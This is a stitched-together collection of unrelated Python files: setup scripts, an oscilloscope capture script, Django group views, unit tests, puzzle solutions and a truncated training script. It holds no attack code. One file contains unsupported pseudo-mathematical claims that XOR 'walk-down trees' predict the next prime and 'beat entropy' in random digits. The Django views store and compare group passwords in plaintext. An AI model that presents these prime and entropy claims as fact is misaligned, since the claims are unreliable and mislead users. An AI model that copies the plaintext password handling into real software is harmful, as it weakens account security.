import setuptools
setuptools.setup(
name="parallel-execute",
version="0.1.0",
author="Sahil Pardeshi",
author_email="sahilrp7@gmail.com",
description="Python wrappers for easy multiprocessing and threading",
long_description=open('README.rst').read(),
url="https://github.com/parallel-execute/parallel-execute",
packages=setuptools.find_packages(),
license='MIT License',
classifiers=[
'Development Status :: 5 - Production/Stable',
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
"Operating System :: OS Independent",
]
)
|
#-------------------------------------------------------------------------------
# Get a screen capture from DPO4000 series scope and save it to a file
# python 2.7 (http://www.python.org/)
# pyvisa 1.4 (http://pyvisa.sourceforge.net/)
# numpy 1.6.2 (http://numpy.scipy.org/)
# MatPlotLib 1.0.1 (http://matplotlib.sourceforge.net/)
#-------------------------------------------------------------------------------
import visa
import numpy as np
from struct import unpack
import pylab
scope = visa.instrument('USB0::0x0699::0x0401::No_Serial::INSTR')
scope.write('DATA:SOU CH1')
scope.write('DATA:WIDTH 1')
scope.write('DATA:ENC RPB')
ymult = float(scope.ask('WFMPRE:YMULT?'))
yzero = float(scope.ask('WFMPRE:YZERO?'))
yoff = float(scope.ask('WFMPRE:YOFF?'))
xincr = float(scope.ask('WFMPRE:XINCR?'))
scope.write('CURVE?')
data = scope.read_raw()
headerlen = 2 + int(data[1])
header = data[:headerlen]
ADC_wave = data[headerlen:-1]
ADC_wave = np.array(unpack('%sB' % len(ADC_wave),ADC_wave))
Volts = (ADC_wave - yoff) * ymult + yzero
Time = np.arange(0, xincr * len(Volts), xincr)
pylab.plot(Time, Volts)
pylab.show()
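# For reference: a minimal sketch of the same acquisition using the modern pyvisa API
# (ResourceManager / open_resource / query), assuming pyvisa >= 1.8 and the same USB
# resource string as above. It is not called by the legacy script and only illustrates
# the newer call names.
def capture_waveform_modern(resource='USB0::0x0699::0x0401::No_Serial::INSTR'):
    import pyvisa
    rm = pyvisa.ResourceManager()
    dpo = rm.open_resource(resource)
    dpo.write('DATA:SOU CH1')
    dpo.write('DATA:WIDTH 1')
    dpo.write('DATA:ENC RPB')
    ymult = float(dpo.query('WFMPRE:YMULT?'))
    yzero = float(dpo.query('WFMPRE:YZERO?'))
    yoff = float(dpo.query('WFMPRE:YOFF?'))
    xincr = float(dpo.query('WFMPRE:XINCR?'))
    # query_binary_values parses the IEEE 488.2 block returned by CURVE? into unsigned bytes
    adc_wave = np.array(dpo.query_binary_values('CURVE?', datatype='B', container=list))
    volts = (adc_wave - yoff) * ymult + yzero
    time_axis = np.arange(0, xincr * len(volts), xincr)
    return time_axis, volts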
|
from .Stock import Stock
|
# xxPostxx
def Xploder(s):
if s==-1:
return 0
elif s==0:
return 1
elif s %2 == 0:
return ((s*2))+1
elif s==2:
return 2
else:
#for x in range(0,10):
temp = s+1
#print(s,temp)
s = temp * 2 -1
return s
def exploder(s):
if s % 2 == 0 and s != 2:
return s-1
elif s==2:
return 2
else:
#for x in range(0,10):
temp = s+1
#print(s,temp)
s = temp * 2 -1
return s
def getnexthex(hm):
a=0
f=''
hm = hex(hm)
hmlen = len(hm) -4
for x in range(0,hmlen):
f += 'f'
hm = int(hm,16) ^ int(str(hm[2] + f + 'e'),16)
return hm
def printssx(j, s,y, previ, h, ssx, number):
hy = h^y
hs = h^s
if hs == 0:
hs = h
hs1 = h^s+1
hssx1 = h^ssx+1
previh = previ^h
if previh == 0:
previh=h
sabsjyj= s^abs(j-(y^j))
ssxabsjyj = ssx^abs(j-(y^j))
if s^y==0:
syhsy= s,h^(s^y)
else:
syhsy= s^y,h^(s^y)
ssxyhsssxy = (exploder(ssx)^y),h^(ssx^y)
hyyy1y12y14= (h^y)^((y^y+1)+((y+1)*2)+((y+1)*4))
print(s,y, ssx, h, hy, hs, hs1,previh, sabsjyj, hssx1, ssxabsjyj, ssxyhsssxy, hyyy1y12y14, 1)
print(s,y, ssx, h, hy, hs, hs1,previh, sabsjyj, hssx1, ssxabsjyj, syhsy, hyyy1y12y14, 2)
print(s,y, exploder(exploder(ssx)), h, hy, hs, hs1,previh, sabsjyj^exploder(exploder(s)), hssx1^exploder(exploder(ssx)), ssxabsjyj^exploder(exploder(ssx)), ssxyhsssxy[0]^exploder(exploder(ssx)), ssxyhsssxy[1]^exploder(exploder(ssx)),hyyy1y12y14^exploder(exploder(h)), 3)
print(s,y, exploder(ssx), h, hy, hs, hs1,previh, sabsjyj^exploder(s), hssx1^exploder(h), ssxabsjyj^exploder(ssx), ssxyhsssxy[0]^exploder(ssx), ssxyhsssxy[1]^exploder(ssx),hyyy1y12y14^exploder(h), 4)
def getintandec(hm):
return hm, hex(hm)
# First random digits of AMillionRandomDigits.bin: 1009732533765201
# We use getnexthex to generate 116167373077422 from 1009732533765201, and you will see that you get the answer
# in the form of 2019465067530403, which //2 is 1009732533765201.
# The anomaly also works for just 1009. Try it: change j to j=getnexthex(1009)-1 and you will get the answer.
# This will also get you the next prime after 1009732533765201, which is 1009732533765251. Try it; the //2 answer is
# the prime. And guess what, we didn't start with that number: we get it from a number which is the getnexthex
# of the answer.
# Very coolly, there is a XOR relationship between the answers above and below the numbers in these columns. They are
# the powers-of-two numbers. You can verify by doing your XORs in getintandec(), like this:
# In [14]: getintandec(2019465067530503^232334746154744)
# Out[14]: (2251799813685247, '0x7ffffffffffff')
#
# I believe we can beat entropy by discovering a hidden order between numbers that is unaccounted for. I believe a
# supercomputer can solve this, but we are humans, and if we put our minds to it, we can be the world's first superintelligences.
# Is there anyone willing to work with me on this monumental achievement? I have a version of this program that is so
# awesome that I can get the next answer to every output, using a doubling of the previous result, getting all the way
# to the answer I want, except for one catch: sometimes the results are negative. I don't know how to account for that;
# I just know that you can walk down the tree each time by just doubling the answer and using XOR, getting to the original
# result from a getnexthex number of your result. That is impressive. What I am noticing is that the negatives seem to occur
# when the XOR chain converges on a power-of-two number, i.e. (2**50) and such.
#
# I do have some unnecessary prints, but this helps me when walking down the XOR chain. My end goal is to get the next value
# by just doubling a number that gets the next result. I'm close; I just need help. Collaboration will get this done. Please
# collaborate with me if you are impressed by this. Thanks.
# Try each of these j= results, by uncommenting the others, and see that you get the answer in a semi walk-down XOR tree.
# No one can patent this method; I am open sourcing the use of a XOR walk-down tree.
# The 9th column is the cool one. Remember to use getintandec(result^previous) to see the walk-down from a power-of-two number - 1.
# Sample output, column 9: 2019465067530503, which //2 is 1009732533765251 (the next prime after 1009732533765201).
# Sample output, column 9: 2019, which //2 is 1009 (the first digits of AMillionRandomDigits, which is already prime).
# Sample output, column 9: 2019465067530403 (which //2 is 1009732533765201, the exact digits of AMillionRandomDigits).
# Sample output, column 9: getintandec(2019465067530403^232334746154844), which is (2251799813685247, '0x7ffffffffffff') and
# is in the first column, because I iterate powers of two to get these results. Cool huh?
# Use ipython to run this; it's a quick way to run the program.
# Mark Nelson: I have learned so much about your random number that I think I can share information about it that would
# impress you. Even though I believe you created this challenge to prove entropy, I have immense appreciation for your
# random number, and having studied it so much over the past few years, I think I'm on the verge of doing what frustrates
# mathematicians: finding a XOR path walking down a tree to get an answer just by doubling a previous result for each
# iteration. I think you might appreciate this and that people are working hard on launching the new information age.
# You must know that one day a superintelligence will find this XOR tree. Why should it not be us? Humans, and not an AI.
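# Quick sanity check of getnexthex() on the small 1009 example from the comments above:
# hex(1009) == '0x3f1', so getnexthex(1009) == 1009 ^ 0x3fe == 15, and j = 15 - 1 == 14.
assert getnexthex(1009) == 15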
def humansoversuperintelligence(j, y, s, ssx):
y=127 #127
s=127 # #1923
ssx=4
j=getnexthex(j)-1 # Which is 14. From 14 we get to 2019, which //2 is 1009. Cool huh?
#j=getnexthex(1009732533765251)-1 # Which is 116167373077372. and in 9th column is the answer if we div/2 Cool huh?
#j=getnexthex(1009732533765201)-1 # Which is 116167373077422. and in the 9th column is the answer if we div/2 Cool huh?
h=j
h=getnexthex(j)
previ=abs(j-(y^j))
breakit = 0
for x in range(0,200):
for xx in range(0,2):
if xx == 0:
printssx(j, s,y,previ,h, ssx, 1)
previ=h
h = abs(getnexthex(j) -(y^getnexthex(j)))
printssx(j, s,y,previ,h, ssx, 2)
y=Xploder(y) #y*2)+1
if xx == 1:
printssx(j, s,y,previ,h, ssx, 0)
previ=h
h = abs(getnexthex(j) -(s^getnexthex(j)))
printssx(j, s,y,previ,h, ssx, 4)
s=Xploder(s)
ssx=Xploder(ssx)
printssx(j, s,y,previ,h, ssx, 4)
if breakit == 1:
break
if len(str(h)) > len(str(j)):
breakit+=1
humansoversuperintelligence(1009, 127, 127, 4)
humansoversuperintelligence(1009732533765251, 127, 127, 4)
humansoversuperintelligence(1009732533765201, 127, 127, 4)
|
from django.shortcuts import render, redirect, reverse, get_object_or_404
from django.contrib import auth, messages
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.contrib.auth.hashers import make_password
from django.contrib.auth.models import User
from .forms import CreateGroupForm, JoinGroupForm
from .models import Group
from profile_and_stats.models import UserProfileData, AttributeRating
from matches.models import MatchData
from django.utils import timezone
import datetime
# Create your views here.
@login_required
def group_select(request):
"""
Displays list of current users groups and option to create
or join new ones
"""
# Query to retrieve group information
my_profile = UserProfileData.objects.get(email=request.user.email)
my_groups = my_profile.my_group.all()
create_group_form = CreateGroupForm()
join_group_form = JoinGroupForm()
return render(request, 'group-select.html', {"create_group_form" : create_group_form, "join_group_form": join_group_form, "my_groups" : my_groups })
@login_required
def create_group(request):
user = User.objects.get(email=request.user.email)
users_profile_data = UserProfileData.objects.get(email=user.email)
if request.method == "POST":
# Create data for new group using request.post details
new_group_data = {}
new_group_data["password"] = request.POST["password"]
new_group_data["creator"] = users_profile_data.username
new_group_data["group_name"] = request.POST["group_name"]
# Feed data into model form and create Group if valid
create_group_form = CreateGroupForm(new_group_data)
if create_group_form.is_valid():
new_group_object = create_group_form.save()
# Add this user (the creator) to the group
new_group_object.users.add(users_profile_data)
new_group_object.save()
messages.success(request, "{} has been created as your new group!".format(request.POST["group_name"]))
return redirect(reverse('group-select'))
else:
join_group_form = JoinGroupForm()
return render(request, 'group-select.html', {"create_group_form": create_group_form, "reg_error":"yes-on-create", "join_group_form": join_group_form })
messages.error(request, "Sorry, you can't do that here!")
return redirect(reverse('group-select'))
@login_required
def group_home(request, id):
this_user = UserProfileData.objects.get(username=request.user.username)
try:
this_group = Group.objects.get(pk=id)
except Group.DoesNotExist:
messages.error(request, "Hmm, we can't find that group. Is that the correct ID?!")
return redirect(reverse('group-select'))
todays_date = datetime.datetime.now().date()
last_weeks_date = datetime.datetime.now().date() - timezone.timedelta(days=7)
groups_matches = MatchData.objects.filter(associated_group=this_group).filter(date_of_match__gte=last_weeks_date).reverse()[0:8]
players_i_have_rated = AttributeRating.objects.filter(rated_by=this_user)
    # Ensure user is a member of the group to allow access
if str(this_user.email) in str(this_group.users.all()):
return render(request, 'group-home.html', {"group_data": this_group, "matches" : groups_matches, "players_i_have_rated" : players_i_have_rated, "this_user" : this_user })
else:
messages.error(request, "Sneeky, but you don't appear to be a member of the group you were trying to access! Join on this page if you have the access details...")
return redirect(reverse('group-select'))
@login_required
def join_group(request):
"""
Allows a user to join a new group
"""
if request.method == "POST":
# Check to see if the group ID exists...
try:
this_group = Group.objects.get(pk=request.POST["group_id"])
# If so, check to see if the group password is correct...
if this_group.password == request.POST["group_password"]:
this_user = UserProfileData.objects.get(username=request.user.username)
if str(this_user.email) in str(this_group.users.all()):
# Is the user already a member?
messages.error(request, "{0}, you are already a member of {1} you crazy cat!".format(this_user.username, this_group.group_name))
else:
# If not, add the user...
this_group.users.add(this_user)
this_group.save()
# Welcome the user and display their new group page...
messages.success(request, "Welcome to {0} {1}!!! Feel free to have a browse!".format(this_group.group_name, this_user.username))
return redirect('group-home', this_group.id)
else:
# If the group password is wrong return an error message...
messages.error(request, "The password you entered for the group is incorrect. Please try again or contact the groups administrator.")
return redirect(reverse('group-select'))
        except Exception:
messages.error(request, "Hmm, we can't find that group. Is that the correct ID?!")
return redirect(reverse('group-select'))
return redirect(reverse('group-select'))
|
import setuptools
with open("../README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="fuzzy-potato",
version='0.0.1',
author="Cezary Maszczyk",
author_email="cezary.maszczyk@gmail.com",
description="Library for string fuzzy matching",
long_description=long_description,
long_description_content_type="text/markdown",
url="h",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: GNU License",
],
python_requires='>=3.6',
)
|
import logging
import argparse
import os
import xml.etree.ElementTree as ET
import vision_genprog.tasks.image_processing as image_processing
import genprog.core as gpcore
import cv2
import ast
logging.basicConfig(level=logging.DEBUG, format='%(asctime)-15s %(message)s')
def main(
imageFilepath,
individualFilepath,
primitivesFilepath,
imageShapeHW,
outputDirectory
):
logging.info("test_image.main()")
if not os.path.exists(outputDirectory):
os.makedirs(outputDirectory)
# Create the interpreter
primitive_functions_tree = ET.parse(primitivesFilepath)
interpreter = image_processing.Interpreter(primitive_functions_tree, imageShapeHW)
# Load the individual
individual = gpcore.LoadIndividual(individualFilepath)
# Load the image
original_img = cv2.imread(imageFilepath, cv2.IMREAD_GRAYSCALE)
input_img = cv2.resize(original_img, dsize=(imageShapeHW[1], imageShapeHW[0]))
input_img_filepath = os.path.join(outputDirectory, "testImage_main_input.png")
cv2.imwrite(input_img_filepath, input_img)
output_heatmap = interpreter.Evaluate(
individual=individual,
variableNameToTypeDict={'image': 'grayscale_image'},
variableNameToValueDict={'image': input_img},
expectedReturnType='binary_image'
)
output_heatmap_filepath = os.path.join(outputDirectory, "testImage_main_heatmap.png")
cv2.imwrite(output_heatmap_filepath, output_heatmap)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('imageFilepath', help="The filepath to the image")
parser.add_argument('individualFilepath', help="The filepath to the individual to test")
parser.add_argument('--primitivesFilepath',
help="The filepath to the primitives xml file. Default: 'vision_genprog/tasks/image_processing.xml'",
default='vision_genprog/tasks/image_processing.xml')
parser.add_argument('--imageShapeHW', help="The image shape (height, width). Default='(256, 256)'",
default='(256, 256)')
parser.add_argument('--outputDirectory', help="The output directory. Default: './test_image_outputs'",
default='./test_image_outputs')
args = parser.parse_args()
imageShapeHW = ast.literal_eval(args.imageShapeHW)
main(
args.imageFilepath,
args.individualFilepath,
args.primitivesFilepath,
imageShapeHW,
args.outputDirectory
)
|
from typing import Callable
from flask import Flask
from flask.testing import FlaskClient
from strawberry.flask.views import GraphQLView
from strawberry import Schema
from src import APOLLO_PERSTISANCE_EXT_KEY
from .conftest import Query
from pytest_benchmark.fixture import BenchmarkFixture
import json
import src.flask.view
QUERY = """
query ($name: String!) {
hello(name: $name)
}
"""
VARS = json.dumps({"name": "bas"})
def test_no_persistance(benchmark: BenchmarkFixture):
app = Flask(__name__)
app.add_url_rule(
"/graphql",
view_func=GraphQLView.as_view(
"graphql_view",
schema=Schema(query=Query),
),
)
with app.test_client() as client:
def exec():
return client.get(
"/graphql",
content_type="application/json",
json={"query": QUERY, "variables": VARS},
)
result = benchmark(exec)
def test_persisted_not_in_cache(
client: FlaskClient,
benchmark: BenchmarkFixture,
str_to_sha256: Callable[[str], str],
mocker,
):
mocker.patch.object(src.flask.view, "cache", {})
hash = str_to_sha256(QUERY)
def exec():
data = {"version": 1, "sha256Hash": hash}
# Initial persist, query hash is now in cache
client.get(
"/graphql",
content_type="application/json",
query_string={
"extensions": json.dumps({APOLLO_PERSTISANCE_EXT_KEY: data}),
"variables": VARS,
},
)
return client.get(
"/graphql",
content_type="application/json",
query_string={
"query": QUERY,
"variables": VARS,
"extensions": json.dumps({APOLLO_PERSTISANCE_EXT_KEY: data}),
},
)
result = benchmark(exec)
assert result is not None
def test_persisted_cached(
client: FlaskClient,
benchmark: BenchmarkFixture,
str_to_sha256: Callable[[str], str],
mocker,
):
hash = str_to_sha256(QUERY)
mocker.patch.object(src.flask.view, "cache", {hash: QUERY})
def exec():
return client.get(
"/graphql",
content_type="application/json",
query_string={
"extensions": json.dumps(
{APOLLO_PERSTISANCE_EXT_KEY: {"version": 1, "sha256Hash": hash}}
),
"variables": VARS,
},
)
result = benchmark(exec)
assert result is not None
|
#!/usr/bin/env python
# Copyright (c) 2016 Hewlett Packard Enterprise Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import numpy as np
from sklearn import svm
from monasca_analytics.sml import svm_one_class
from test.util_for_testing import MonanasTestCase
logger = logging.getLogger(__name__)
class TestSvmOneClass(MonanasTestCase):
def setUp(self):
super(TestSvmOneClass, self).setUp()
self.svm = svm_one_class.SvmOneClass("fakeid", {
"module": "fake",
"nb_samples": 1000
})
def tearDown(self):
super(TestSvmOneClass, self).tearDown()
def get_testing_data(self):
a = np.random.uniform(size=1000)
b = np.random.uniform(size=1000)
c = np.random.uniform(size=1000)
d = np.random.uniform(size=1000)
return np.array([a, b, c, d]).T
def test_generate_train_test_sets(self):
data = self.get_testing_data()
train, test = self.svm._generate_train_test_sets(data, 0.6)
self.assertEqual(600, len(train))
self.assertEqual(400, len(test))
def test_learn_structure(self):
data = self.get_testing_data()
clf = self.svm.learn_structure(data)
self.assertIsInstance(clf, svm.OneClassSVM)
|
class Solution:
def numRescueBoats(self, people, limit):
"""
:type people: List[int]
:type limit: int
:rtype: int
"""
people.sort()
start, end = 0, len(people) - 1
total = 0
while start <= end:
total += 1
if people[start] + people[end] <= limit:
start += 1
end -= 1
return total
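# Quick check of the greedy two-pointer solution above, using the standard examples
# for this problem (illustrative, not part of the original submission):
if __name__ == '__main__':
    assert Solution().numRescueBoats([1, 2], 3) == 1
    assert Solution().numRescueBoats([3, 2, 2, 1], 3) == 3
    assert Solution().numRescueBoats([3, 5, 3, 4], 5) == 4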
|
#!/usr/bin/env python3
import requests
import sys
import os
import typing
from bech32 import bech32_encode, bech32_decode
BECH32_PUBKEY_ACC_PREFIX = "bandpub"
BECH32_PUBKEY_VAL_PREFIX = "bandvaloperpub"
BECH32_PUBKEY_CONS_PREFIX = "bandvalconspub"
BECH32_ADDR_ACC_PREFIX = "band"
BECH32_ADDR_VAL_PREFIX = "bandvaloper"
BECH32_ADDR_CONS_PREFIX = "bandvalcons"
URL = "https://asia-southeast2-price-caching.cloudfunctions.net/query-price"
HEADERS = {"Content-Type": "application/json"}
def test_bech32():
testBechStr = "band1m5lq9u533qaya4q3nfyl6ulzqkpkhge9q8tpzs"
hrp, bz = bech32_decode(testBechStr)
assert hrp == BECH32_ADDR_ACC_PREFIX, "Invalid bech32 prefix"
assert bz is not None, "result should not be empty"
result = bech32_encode(BECH32_ADDR_VAL_PREFIX, bz)
assert result == "bandvaloper1m5lq9u533qaya4q3nfyl6ulzqkpkhge9v30z8m", "invalid encoding"
def main(symbols):
try:
payload = {"source": "cmc", "symbols": symbols}
# test bech32 usage
test_bech32()
pxs = requests.request("POST", URL, headers=HEADERS, json=payload).json()
if len(pxs) != len(symbols):
raise Exception("PXS_AND_SYMBOL_LEN_NOT_MATCH")
return ",".join(pxs)
except Exception as e:
print(e)
if __name__ == "__main__":
try:
print(main([*sys.argv[1:]]))
except Exception as e:
print(str(e), file=sys.stderr)
sys.exit(1)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-02-14 21:08
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('namubufferiapp', '0008_auto_20170211_2148'),
]
operations = [
migrations.AlterField(
model_name='account',
name='magic_token_ttl',
field=models.DateTimeField(default=datetime.datetime(2017, 2, 14, 21, 23, 7, 788486, tzinfo=utc)),
),
migrations.AlterField(
model_name='product',
name='price',
field=models.DecimalField(decimal_places=2, default=1, max_digits=5),
),
]
|
# python3
from gooey import *
import sys
from pyfaidx import Fasta
# input parameters
@Gooey(required_cols=4, program_name= 'split fasta into chunks optimized', header_bg_color= '#DCDCDC', terminal_font_color= '#DCDCDC', terminal_panel_color= '#DCDCDC')
def main():
ap = GooeyParser()
ap.add_argument("-in", "--input", required=True, widget='FileChooser', help="input single or multi-fasta file")
ap.add_argument("-out", "--output", required=True, widget='FileSaver', help="output multi-fasta file")
ap.add_argument("-step", "--step", required=True, type=int, help="step size for chunk creation, type = integer")
ap.add_argument("-win", "--window", required=True, type=int, help="window size for chunk creation, type = integer")
args = vars(ap.parse_args())
# main
# create function to split the input sequence based on a specific number of characters(60)
def split_every_60(s): return [str(s)[i:i+60] for i in range(0,len(str(s)),60)]
# create function to slice based on window and step
def slice_by_winstep(rec):
for i in range(0, features[rec][:].end - args['window'] + 1, args['step']):
print(''.join([">",rec,"_",str(i+1),"_",str(i + args['window'])]))
print('\n'.join(split_every_60(features[rec][i:i + args['window']].seq)))
return
# import multi or single-fasta file
features = Fasta(args['input'])
# iterate input headers to extract sequences and export as multi-fasta
sys.stdout = open(args['output'], 'a')
for key in features.keys():
slice_by_winstep(key)
sys.stdout.close()
if __name__ == '__main__':
main()
|
import pytest
from sr.tables import _cid, _concepts, _snomed
def test_cid_table():
"""Basic _cid table functionality tests."""
assert _cid.name_for_cid[2] == "AnatomicModifier"
assert "SCT" in _cid.cid_concepts[2]
assert "DCM" in _cid.cid_concepts[2]
def test_concepts_table():
"""Basic _concepts table functionality tests."""
assert isinstance(_concepts.concepts["SCT"], dict)
def test_snomed_table():
"""Basic _concepts table functionality tests."""
assert isinstance(_snomed.mapping["SCT"], dict)
assert isinstance(_snomed.mapping["SRT"], dict)
|
#!/home/jepoy/anaconda3/bin/python
import sys
import os
import random
import datetime
def main():
v = sys.version_info
print('Python version {}.{}.{}'.format(*v)) # note *v - returns a collection
v = sys.platform
print(v)
v = os.name
print(v)
v = os.getenv('PATH')
print(v)
v = os.getcwd() # Current Working Directory
print(v)
    v = os.urandom(25) # bytes object
print(v)
x = random.randint(1, 1000)
print(x)
x = list(range(25))
print(x)
random.shuffle(x)
print(x)
now = datetime.datetime.now()
print(now, now.year, now.month, now.day, now.hour, now.minute, now.second, now.microsecond)
if __name__ == '__main__': main()
|
def divisors(nb: int, extremum = False) -> list:
divisors = []
inf = 1 if extremum else 2
for i in range(inf, int(nb ** 0.5) + 1):
q, r = divmod(nb, i)
if r == 0:
if q >= i:
divisors.append(i)
if q > i:
divisors.append(nb // i)
return divisors
def d(nb: int) -> int:
return 1 + sum(divisors(nb))
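# Quick check of d() on the classic amicable pair (220, 284):
assert d(220) == 284 and d(284) == 220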
if __name__ == "__main__":
resultat = 0
for a in range(1, 10000):
b = d(a)
if d(b) == a and a != b:
resultat += a
print(resultat)
|
from collections import OrderedDict
class CaseInsensitiveDict:
def __init__(self):
self.dict = OrderedDict()
def __repr__(self):
return str(list(self.dict.values()))
def __getitem__(self, key):
return self.dict[key.lower()][1]
def __setitem__(self, key, value):
self.dict[key.lower()] = (key, value)
def __contains__(self, key):
return key.lower() in self.dict
def get(self, key, default=None):
if key.lower() in self.dict:
return self.dict[key.lower()][1]
return default
def items(self):
return self.dict.values()
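# Brief usage sketch of the case-insensitive mapping above (illustrative values):
if __name__ == '__main__':
    headers = CaseInsensitiveDict()
    headers['Content-Type'] = 'application/json'
    assert 'content-type' in headers
    assert headers['CONTENT-TYPE'] == 'application/json'
    assert headers.get('missing', 'n/a') == 'n/a'
    print(list(headers.items()))  # [('Content-Type', 'application/json')]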
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.IEC61970.Dynamics.ExcitationSystems.ExcitationSystem import ExcitationSystem
class ExcST6B(ExcitationSystem):
"""IEEE (2005) ST6B Model The AVR consists of a PI voltage regulator with an inner loop field voltage regulator and pre-control. The field voltage regulator implements a proportional control. The pre-control and the delay in the feedback circuit increase the dynamic response.
"""
def __init__(self, tr=0.0, ilr=0.0, vrmin=0.0, vmult=0.0, vrmax=0.0, oelin=0.0, klr=0.0, kg=0.0, kpa=0.0, vamax=0.0, ts=0.0, kcl=0.0, tg=0.0, vamin=0.0, kia=0.0, kff=0.0, km=0.0, *args, **kw_args):
"""Initialises a new 'ExcST6B' instance.
@param tr: Filter time constant (>= 0.)
@param ilr: Field current limiter setpoint (> 0.)
@param vrmin: Minimum regulator output (< 0.)
@param vmult: If non-zero, multiply regulator output by terminal voltage
@param vrmax: Maximum regulator output (> 0.)
        @param oelin: OEL input selector: 1 = before UEL, 2 = after UEL, 0 = no OEL input
@param klr: Field current limiter gain (> 0.)
@param kg: Feedback gain (>= 0.)
@param kpa: Regulator proportional gain (> 0.)
@param vamax: PI maximum output. (> 0.)
@param ts: Rectifier firing time constant (not in IEEE model) (>= 0.)
@param kcl: Field current limiter conversion factor (> 0.)
@param tg: Feedback time constant (>= 0.)
@param vamin: PI minimum output (< 0.)
@param kia: Regulator integral gain (> 0.)
@param kff: Feedforward gain
@param km: Main gain
"""
#: Filter time constant (>= 0.)
self.tr = tr
#: Field current limiter setpoint (> 0.)
self.ilr = ilr
#: Minimum regulator output (< 0.)
self.vrmin = vrmin
#: If non-zero, multiply regulator output by terminal voltage
self.vmult = vmult
#: Maximum regulator output (> 0.)
self.vrmax = vrmax
        #: OEL input selector: 1 = before UEL, 2 = after UEL, 0 = no OEL input
self.oelin = oelin
#: Field current limiter gain (> 0.)
self.klr = klr
#: Feedback gain (>= 0.)
self.kg = kg
#: Regulator proportional gain (> 0.)
self.kpa = kpa
#: PI maximum output. (> 0.)
self.vamax = vamax
#: Rectifier firing time constant (not in IEEE model) (>= 0.)
self.ts = ts
#: Field current limiter conversion factor (> 0.)
self.kcl = kcl
#: Feedback time constant (>= 0.)
self.tg = tg
#: PI minimum output (< 0.)
self.vamin = vamin
#: Regulator integral gain (> 0.)
self.kia = kia
#: Feedforward gain
self.kff = kff
#: Main gain
self.km = km
super(ExcST6B, self).__init__(*args, **kw_args)
_attrs = ["tr", "ilr", "vrmin", "vmult", "vrmax", "oelin", "klr", "kg", "kpa", "vamax", "ts", "kcl", "tg", "vamin", "kia", "kff", "km"]
_attr_types = {"tr": float, "ilr": float, "vrmin": float, "vmult": float, "vrmax": float, "oelin": float, "klr": float, "kg": float, "kpa": float, "vamax": float, "ts": float, "kcl": float, "tg": float, "vamin": float, "kia": float, "kff": float, "km": float}
_defaults = {"tr": 0.0, "ilr": 0.0, "vrmin": 0.0, "vmult": 0.0, "vrmax": 0.0, "oelin": 0.0, "klr": 0.0, "kg": 0.0, "kpa": 0.0, "vamax": 0.0, "ts": 0.0, "kcl": 0.0, "tg": 0.0, "vamin": 0.0, "kia": 0.0, "kff": 0.0, "km": 0.0}
_enums = {}
_refs = []
_many_refs = []
|
# coding: utf-8
# Like v2, and in contrast to v1, this version removes the cumprod from the forward pass
# In addition, it uses a different conditional loss function compared to v2.
# Here, the loss is computed as the average loss over all samples,
# instead of first averaging the cross entropy within each task and then averaging over tasks equally.
# The weight of each task is thereby adjusted naturally for the sample size used to train each task,
# without manually setting the weights.
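# Illustrative sketch (not used by the training script below) of the averaging difference
# described above, with two hypothetical tasks of unequal sample counts: averaging per task
# first weights both tasks equally, while averaging over all samples weights by sample count.
def _loss_averaging_example():
    task_a = [1.0, 1.0, 1.0, 1.0]   # 4 samples, mean loss 1.0
    task_b = [3.0, 3.0]             # 2 samples, mean loss 3.0
    per_task_then_mean = (sum(task_a) / len(task_a) + sum(task_b) / len(task_b)) / 2  # 2.0
    mean_over_all_samples = sum(task_a + task_b) / len(task_a + task_b)               # ~1.67
    return per_task_then_mean, mean_over_all_samples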
# Imports
import os
import json
import pandas as pd
import time
import torch
import torch.nn as nn
import argparse
import sys
import numpy as np
from torch.utils.data import DataLoader
from torch.utils.data import SubsetRandomSampler
# ### from local .py files
sys.path.insert(0, "./helper_files") # to include ../layer.py etc.
from trainingeval import (iteration_logging, epoch_logging,
aftertraining_logging, save_predictions,
create_logfile)
from trainingeval import compute_per_class_mae, compute_selfentropy_for_mae
from resnet34 import BasicBlock
from dataset import levels_from_labelbatch
from losses import loss_conditional_v2
from helper import set_all_seeds, set_deterministic
from plotting import plot_training_loss, plot_mae, plot_accuracy
from plotting import plot_per_class_mae
from dataset import get_labels_from_loader
from parser import parse_cmdline_args
# Argparse helper
parser = argparse.ArgumentParser()
args = parse_cmdline_args(parser)
##########################
# Settings and Setup
##########################
NUM_WORKERS = args.numworkers
LEARNING_RATE = args.learningrate
NUM_EPOCHS = args.epochs
BATCH_SIZE = args.batchsize
